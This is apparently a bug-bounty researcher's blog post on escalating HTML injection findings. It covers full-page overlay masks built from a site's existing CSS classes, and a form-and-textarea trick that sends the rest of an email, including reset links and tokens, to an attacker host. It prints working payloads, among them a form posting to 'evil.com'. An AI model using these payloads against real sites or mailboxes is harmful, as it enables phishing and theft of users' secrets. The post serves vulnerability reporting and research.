How do I change HTMLi from Low to Critical? Is your mailbox safe?
In this post, I’m just sharing how I increased the impact of regular HTMLi bugs from Low to Medium, High and even Critical impact.
Normally, I you have tried everything but can not exploit you HTMLi bug to XSS, SSRF, SSTI, etc,… You have to ignore this bug or try to report with low impact. I even have a lot report HTMLi rejected with Information status :((
I was trying to find anoter way to exploit this bug to increase its impact, here are some of the ways I used:
1. From Low to Medium, High impact by: “class”
If the application only accept your input with the basic html tags such as: <a>, <img>, <p>, <div>, <br>,… You can report it but I’m sure your report only get the low bounty.
I had reported some bugs with this normal html injection payload: <a href='https://attacker_domain'>CLICK HERE</a> and of course it only get the low bounty
But after that I found that I could increase the impact to Medium. That is, if you can create a layer mask with your html code, this layer mask will completely cover full of the current page, then obviously the availability will be raised to low, or even high. And to popup a full screen layer mas k you can use this simple payload:
<a href='https://attacker_domain'><img src=layer_mask_image style='position:fixed; top:0; left: 0; width: 100%'></a>`
This payload will work if you could control the `style` for these basic tags.
To control style in html code, people will usually insert the tag `<style>` or or insert the `style` attribute (ex: <a style=’….’>) , and this <style> tag or `style` attribute is also very often blocked, removed or filtered only for basic properties such as width, height, … (ex: <a style=’height: 100px;’>).
How do I control the style in a basic html without editable js, css, <style>, ‘style’ attribute ??????
→ Yeah!!!! I have another way :)) that is using the ‘CLASS’ or ‘ID’ attribute.
Normal libraries will not remove or filter this ‘class’ or ‘id’ attribute, how amazing??
I realize that a website always has many .css files with pre-defined styles for `class`, so we just need to find the correct class name that has `position:fixed` , `top:0` , `width: 100%` . I call this method is Style Gadget Attack — SGA
And it’s not difficult to find the classes for the gadget we want above (`position:fixed` , `top:0` , `width: 100%`)
Especially, if the page use the bootstrap this simple use the class ‘modal’ , ‘shadow-modal’, ...
Depending on the location you inject the html into, maybe comment in main page of inbox chat,… the impact of this SGA technique will be medium or high because it affects to the `availability` of the page for another user of all users.
2. From Low to High, Critical impact by sending email.
I have many HTMLi reports in email, usually it allow attacker control content of the email which sent from a valid domain to any victim's email. And of course, it only gets a low bounty of N/A because it’s like a spam with no further impact :(((((
After some research, I discovered that the email provider (Gmail, Outlook, Zoho,…) allow us to inject the <form> tag as a valid tag. Great, I thought about injecting a Login Form to trick victim input his user, password,.. yes It is still considered spam and is still Low impact, Low bounty. :((((
After reporting and being closed many times, it was so annoying that I tried and found a way to increased the impact of type this bug. I realized that if I could only inject into the content of victim's email, it would have low impact, but if I could get the content of this emails (the content of email normally includes token, reset pass, otp, … ) as well, then clearly its impact would be too serious.
Normally you will be able to insert html into the user name, group name, company name, etc.. into the email as shown below, and have you ever thought you would be able to get other content in the email like victim's “Activate victim’s link is as shown below. Yes I can do it by my simple payload.
As I said above, the email box allows us to insert the <form> tag, which means we will be able to send information from this form, so how can we get the content inside email sent to the victim
I realized the interesting thing about the <textarea> tag (it is also a valid tag allowed in emails), all html content following it will be turned into text and attached to the content, contained in a previous form tag.
The above completely works with Gmail, Outlook, …
Summary:
You can use a basic html injection with higher impact, and get secret key tokens, reset link, etc. not only in emails but also on any page where you insert html (I have had many reports with high, critical impact with this method) with the payloads below:
- For create layer mask:
<a href='evil.com'><img src='img_link' class='SGA_class ..' ></a>...
- For obtain content page, email:
<form action='//evil.com'><button type='submit'><textarea name='x'>...
In reality, I have a lot of case need to bypass base on sample payload blow. Feel free to contact me if you need to collaborate to exploit similar types of bugs
@lamscun (https://hackerone.com/lamscun , https://twitter.com/lamscun)
@flyseccorp (https://www.flyseccorp.com/ , https://twitter.com/flysec_corp)
